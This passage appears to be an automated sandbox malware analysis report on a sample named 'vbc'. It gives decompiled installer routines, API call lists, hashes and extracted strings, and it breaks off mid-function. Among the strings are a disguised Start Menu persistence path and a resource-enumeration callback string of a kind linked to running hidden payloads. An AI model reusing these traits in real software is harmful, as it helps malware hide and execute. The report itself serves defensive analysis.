                                                • SetWindowTextW.USER32 ref: 004047EA
                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
                                                • CoTaskMemFree.OLE32(00000000), ref: 004048A6
                                                • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004048D8
                                                • lstrcatW.KERNEL32 ref: 004048E4
                                                • SetDlgItemTextW.USER32 ref: 004048F6
                                                  • Part of subcall function 0040593B: GetDlgItemTextW.USER32 ref: 0040594E
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?), ref: 00406509
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?), ref: 00406518
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?), ref: 0040651D
                                                  • Part of subcall function 004064A6: CharPrevW.USER32(?,?), ref: 00406530
                                                • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 004049B9
                                                • MulDiv.KERNEL32 ref: 004049D4
                                                  • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                  • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
                                                  • Part of subcall function 00404B2D: SetDlgItemTextW.USER32 ref: 00404BEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                • API String ID: 2624150263-3883459150
                                                • Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                • Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
                                                • Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                • Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E00402104() {
                                                				signed int _t52;
                                                				void* _t56;
                                                				intOrPtr* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr* _t72;
                                                				intOrPtr* _t74;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				void* _t83;
                                                				intOrPtr* _t91;
                                                				signed int _t101;
                                                				signed int _t105;
                                                				void* _t107;
                                                
                                                				 *((intOrPtr*)(_t107 - 0x50)) = E00402C53(0xfffffff0);
                                                				 *((intOrPtr*)(_t107 - 0x38)) = E00402C53(0xffffffdf);
                                                				 *((intOrPtr*)(_t107 - 8)) = E00402C53(2);
                                                				 *((intOrPtr*)(_t107 - 0x48)) = E00402C53(0xffffffcd);
                                                				 *((intOrPtr*)(_t107 - 0xc)) = E00402C53(0x45);
                                                				_t52 =  *(_t107 - 0x18);
                                                				 *(_t107 - 0x44) = _t52 & 0x00000fff;
                                                				_t101 = _t52 & 0x00008000;
                                                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405C3D( *((intOrPtr*)(_t107 - 0x38))) == 0) {
                                                					E00402C53(0x21);
                                                				}
                                                				_t56 = _t107 + 8;
                                                				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                				if(_t56 < _t83) {
                                                					L14:
                                                					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x30);
                                                					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
                                                					if(_t61 >= _t83) {
                                                						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x38)));
                                                						if(_t101 == _t83) {
                                                							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac");
                                                						}
                                                						if(_t105 != _t83) {
                                                							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                						_t91 =  *((intOrPtr*)(_t107 - 0x48));
                                                						if( *_t91 != _t83) {
                                                							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
                                                						}
                                                						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                							_t74 =  *((intOrPtr*)(_t107 - 0x30));
                                                							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x50)), 1);
                                                						}
                                                						_t72 =  *((intOrPtr*)(_t107 - 0x30));
                                                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                					}
                                                					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L14;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t107 - 4));
                                                				return 0;
                                                			}






















                                                0x0040210d
                                                0x00402117
                                                0x00402121
                                                0x0040212b
                                                0x00402136
                                                0x00402139
                                                0x00402153
                                                0x00402156
                                                0x0040215c
                                                0x0040215f
                                                0x00402169
                                                0x0040216d
                                                0x0040216d
                                                0x00402172
                                                0x00402183
                                                0x0040218b
                                                0x00402242
                                                0x00402242
                                                0x00402249
                                                0x00402191
                                                0x00402191
                                                0x004021a0
                                                0x004021a4
                                                0x004021a7
                                                0x004021ad
                                                0x004021bb
                                                0x004021be
                                                0x004021c0
                                                0x004021cb
                                                0x004021cb
                                                0x004021d0
                                                0x004021d2
                                                0x004021d9
                                                0x004021d9
                                                0x004021dc
                                                0x004021e5
                                                0x004021e8
                                                0x004021ee
                                                0x004021f0
                                                0x004021fa
                                                0x004021fa
                                                0x004021fd
                                                0x00402206
                                                0x00402209
                                                0x00402212
                                                0x00402218
                                                0x0040221a
                                                0x00402228
                                                0x00402228
                                                0x0040222b
                                                0x00402231
                                                0x00402231
                                                0x00402234
                                                0x0040223a
                                                0x00402240
                                                0x00402255
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402240
                                                0x0040224b
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402183
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 004021C3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
                                                • API String ID: 542301482-910239263
                                                • Opcode ID: 1f3fbbfb6b0ee92c2e95c354eda2b83ee9640ec022ed1a25e088aabce2a4beb5
                                                • Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
                                                • Opcode Fuzzy Hash: 1f3fbbfb6b0ee92c2e95c354eda2b83ee9640ec022ed1a25e088aabce2a4beb5
                                                • Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E0040287E(short __ebx, short* __esi) {
                                                				void* _t21;
                                                
                                                				if(FindFirstFileW(E00402C53(2), _t21 - 0x2b8) != 0xffffffff) {
                                                					E00406159( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                					_push(_t21 - 0x28c);
                                                					_push(__esi);
                                                					E00406212();
                                                				} else {
                                                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                					 *__esi = __ebx;
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}




                                                0x00402896
                                                0x004028b1
                                                0x004028bc
                                                0x004028bd
                                                0x004029f7
                                                0x00402898
                                                0x0040289b
                                                0x0040289e
                                                0x004028a1
                                                0x004028a1
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040288D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: f0571f4bbbdcd8fa4134a8b5f0c6d2c473a1f5fbcdf1fbb2f68873db9ea6aa96
                                                • Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
                                                • Opcode Fuzzy Hash: f0571f4bbbdcd8fa4134a8b5f0c6d2c473a1f5fbcdf1fbb2f68873db9ea6aa96
                                                • Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00404473(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                				short* _v8;
                                                				int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t56;
                                                				signed int _t75;
                                                				signed short* _t76;
                                                				signed short* _t78;
                                                				long _t92;
                                                				int _t103;
                                                				signed int _t110;
                                                				intOrPtr _t113;
                                                				WCHAR* _t114;
                                                				signed int* _t116;
                                                				WCHAR* _t117;
                                                				struct HWND__* _t118;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L13:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x4216f4 =  *0x4216f4 + 1;
                                                							}
                                                							L27:
                                                							_t114 = _a16;
                                                							L28:
                                                							return E0040433D(_a8, _a12, _t114);
                                                						}
                                                						_t56 = GetDlgItem(_a4, 0x3e8);
                                                						_t114 = _a16;
                                                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                							_v12 = _t103;
                                                							_v16 = _t113;
                                                							_v8 = 0x4281e0;
                                                							if(_t103 - _t113 < 0x800) {
                                                								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorW(0, 0x7f02));
                                                								ShellExecuteW(_a4, L"open", _v8, 0, 0, 1);
                                                								SetCursor(LoadCursorW(0, 0x7f00));
                                                								_t114 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                							goto L28;
                                                						} else {
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                								SendMessageW( *0x42a248, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                								SendMessageW( *0x42a248, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
                                                						goto L27;
                                                					} else {
                                                						_t116 =  *0x422700 + 0x14;
                                                						if(( *_t116 & 0x00000020) == 0) {
                                                							goto L27;
                                                						}
                                                						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E004042F8(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E00404706();
                                                						goto L13;
                                                					}
                                                				}
                                                				_t117 = _a16;
                                                				_t75 =  *(_t117 + 0x30);
                                                				if(_t75 < 0) {
                                                					_t75 =  *( *0x42921c - 4 + _t75 * 4);
                                                				}
                                                				_t76 =  *0x42a278 + _t75 * 2;
                                                				_t110 =  *_t76 & 0x0000ffff;
                                                				_a8 = _t110;
                                                				_t78 =  &(_t76[1]);
                                                				_a16 = _t78;
                                                				_v16 = _t78;
                                                				_v12 = 0;
                                                				_v8 = E00404424;
                                                				if(_t110 != 2) {
                                                					_v8 = E004043EA;
                                                				}
                                                				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                				_push(0x22);
                                                				E004042D6(_a4);
                                                				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                				_push(0x23);
                                                				E004042D6(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E004042F8( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                				_t118 = GetDlgItem(_a4, 0x3e8);
                                                				E0040430B(_t118);
                                                				SendMessageW(_t118, 0x45b, 1, 0);
                                                				_t92 =  *( *0x42a250 + 0x68);
                                                				if(_t92 < 0) {
                                                					_t92 = GetSysColor( ~_t92);
                                                				}
                                                				SendMessageW(_t118, 0x443, 0, _t92);
                                                				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                				 *0x4216f4 = 0;
                                                				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                				 *0x4216f4 = 0;
                                                				return 0;
                                                			}


















                                                0x00404485
                                                0x004045b2
                                                0x0040460f
                                                0x00404613
                                                0x004046e8
                                                0x004046ea
                                                0x004046ea
                                                0x004046f0
                                                0x004046f0
                                                0x004046f3
                                                0x00000000
                                                0x004046fa
                                                0x00404621
                                                0x00404627
                                                0x00404631
                                                0x0040463c
                                                0x0040463f
                                                0x00404642
                                                0x0040464d
                                                0x00404650
                                                0x00404657
                                                0x00404664
                                                0x00404675
                                                0x0040468a
                                                0x00404699
                                                0x0040469f
                                                0x0040469f
                                                0x00404657
                                                0x004046a9
                                                0x00000000
                                                0x004046b4
                                                0x004046b8
                                                0x004046c8
                                                0x004046c8
                                                0x004046ce
                                                0x004046da
                                                0x004046da
                                                0x00000000
                                                0x004046de
                                                0x004046a9
                                                0x004045bd
                                                0x00000000
                                                0x004045cf
                                                0x004045d4
                                                0x004045da
                                                0x00000000
                                                0x00000000
                                                0x00404603
                                                0x00404605
                                                0x0040460a
                                                0x00000000
                                                0x0040460a
                                                0x004045bd
                                                0x0040448b
                                                0x0040448e
                                                0x00404493
                                                0x004044a4
                                                0x004044a4
                                                0x004044ac
                                                0x004044af
                                                0x004044b3
                                                0x004044b6
                                                0x004044ba
                                                0x004044bd
                                                0x004044c0
                                                0x004044c3
                                                0x004044ca
                                                0x004044cc
                                                0x004044cc
                                                0x004044d6
                                                0x004044e3
                                                0x004044ed
                                                0x004044f2
                                                0x004044f5
                                                0x004044fa
                                                0x00404511
                                                0x00404518
                                                0x0040452b
                                                0x0040452e
                                                0x00404542
                                                0x00404549
                                                0x0040454e
                                                0x00404553
                                                0x00404553
                                                0x00404561
                                                0x0040456f
                                                0x00404581
                                                0x00404586
                                                0x00404596
                                                0x00404598
                                                0x00000000

                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404511
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404525
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404542
                                                • GetSysColor.USER32 ref: 00404553
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
                                                • lstrlenW.KERNEL32(?), ref: 00404574
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
                                                • GetDlgItem.USER32(?,0000040A), ref: 004045EF
                                                • SendMessageW.USER32(00000000), ref: 004045F6
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404621
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
                                                • LoadCursorW.USER32 ref: 00404672
                                                • SetCursor.USER32(00000000), ref: 00404675
                                                • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 0040468A
                                                • LoadCursorW.USER32 ref: 00404696
                                                • SetCursor.USER32(00000000), ref: 00404699
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004046C8
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: Call$N$open$C@
                                                • API String ID: 3615053054-3980584120
                                                • Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                • Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
                                                • Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                • Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x42a250;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
                                                				}
                                                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405F41(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
